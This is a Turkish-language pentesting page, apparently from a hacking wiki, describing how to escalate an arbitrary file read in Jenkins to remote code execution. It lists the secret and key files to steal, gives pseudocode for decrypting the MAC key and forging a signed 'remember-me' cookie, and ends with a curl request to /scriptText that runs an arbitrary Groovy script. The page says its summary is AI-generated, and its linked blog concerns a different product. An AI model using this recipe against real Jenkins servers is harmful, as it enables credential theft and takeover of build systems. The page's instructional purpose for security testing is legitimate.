Jenkins Arbitrary File Read to RCE via "Remember Me"

Bu blog yazısında, Jenkins'teki bir Yerel Dosya Dahil Etme açığını RCE'ye dönüştürmenin harika bir yolunu bulabilirsiniz: https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/

Bu, bir rastgele çerezin kötüye kullanıldığı ve RCE elde etmek için yerel dosya okuma ile istismar edildiği kısmın AI tarafından oluşturulmuş bir özetidir, kendi özetimi oluşturacak zamanım olana kadar:

Saldırı Ön Koşulları

• Özellik Gereksinimi: "Beni hatırla" etkin olmalıdır (varsayılan ayar).

• Erişim Düzeyleri: Saldırganın Genel/Okuma izinlerine ihtiyacı vardır.

• Gizli Erişim: Anahtar dosyalardan hem ikili hem de metin içeriğini okuma yeteneği.

Ayrıntılı İstismar Süreci

Adım 1: Veri Toplama

Kullanıcı Bilgisi Alma

• Her kullanıcı için $JENKINS_HOME/users/*.xml dosyasından kullanıcı yapılandırması ve gizli bilgileri erişin:

• Kullanıcı Adı

• Kullanıcı tohum

• Zaman damgası

• Şifre hash'i

Gizli Anahtar Çıkartma

• Çerezi imzalamak için kullanılan kriptografik anahtarları çıkartın:

• Gizli Anahtar: $JENKINS_HOME/secret.key

• Anahtar: $JENKINS_HOME/secrets/master.key

• MAC Anahtar Dosyası: $JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac

Adım 2: Çerez Sahteciliği

Token Hazırlığı

• Token Süre Sonunu Hesapla:

tokenExpiryTime = currentServerTimeInMillis() + 3600000  // Mevcut zamana bir saat ekler

• Token için Verileri Birleştir:

token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey

MAC Anahtarını Şifre Çözme

• MAC Anahtar Dosyasını Şifre Çöz:

key = toAes128Key(masterKey)  // Anahtarı AES128 anahtar formatına dönüştür
decrypted = AES.decrypt(macFile, key)  // .mac dosyasını şifre çöz
if not decrypted.hasSuffix("::::MAGIC::::")
return ERROR;
macKey = decrypted.withoutSuffix("::::MAGIC::::")

İmza Hesaplama

• HMAC SHA256 Hesapla:

mac = HmacSHA256(token, macKey)  // Token ve MAC anahtarını kullanarak HMAC hesapla
tokenSignature = bytesToHexString(mac)  // MAC'i onaltılık dizeye dönüştür

Çerez Kodlama

• Son Çerezi Oluştur:

cookie = base64.encode(username + ":" + tokenExpiryTime + ":" + tokenSignature)  // Çerez verilerini Base64 ile kodla

Adım 3: Kod Çalıştırma

Oturum Kimlik Doğrulama

• CSRF ve Oturum Token'larını Al:

• Jenkins-Crumb almak için /crumbIssuer/api/json adresine bir istek yapın.

• Yanıttan JSESSIONID'yi yakalayın, bu remember-me çerezi ile birlikte kullanılacaktır.

Komut Çalıştırma İsteği

• Groovy Script ile POST İsteği Gönder:

curl -X POST "$JENKINS_URL/scriptText" \
--cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \
--header "Jenkins-Crumb: $CRUMB" \
--header "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "script=$SCRIPT"

• Groovy script, sistem düzeyinde komutları veya Jenkins ortamında diğer işlemleri çalıştırmak için kullanılabilir.

Verilen örnek curl komutu, gerekli başlıklar ve çerezlerle Jenkins'e istek yaparak rastgele kodu güvenli bir şekilde çalıştırmanın nasıl yapılacağını göstermektedir.